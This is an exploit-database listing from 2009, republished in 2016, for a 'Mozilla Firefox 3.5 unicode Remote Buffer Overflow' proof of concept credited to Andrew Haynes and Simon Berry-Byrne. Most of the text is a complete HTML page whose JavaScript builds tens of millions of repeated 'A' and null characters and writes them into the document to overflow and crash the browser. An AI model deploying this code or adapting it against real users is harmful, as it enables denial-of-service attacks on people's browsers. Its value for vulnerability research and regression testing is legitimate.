Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC

2009-07-15T00:00:00
ID 1337DAY-ID-6915
Type zdt
Reporter Andrew Haynes
Modified 2009-07-15T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ======================================================
Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC
======================================================


------------------------------------------->
Firefox 3.5 unicode stack overflow

Andrew Haynes , Simon Berry-Byrne

------------------------------------------->


<html>
<head>
<script language="JavaScript" type="Text/Javascript">
	var str = unescape("%u4141%u4141");
	var str2 = unescape("%u0000%u0000");
	var finalstr2 = mul8(str2, 49000000);
	var finalstr = mul8(str,   21000000);


document.write(finalstr2); 
document.write(finalstr); 

function mul8 (str, num) {
	var	i = Math.ceil(Math.log(num) / Math.LN2),
		res = str;
	do {
		res += res;
	} while (0 < --i);
	return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>



#  0day.today [2016-04-19]  #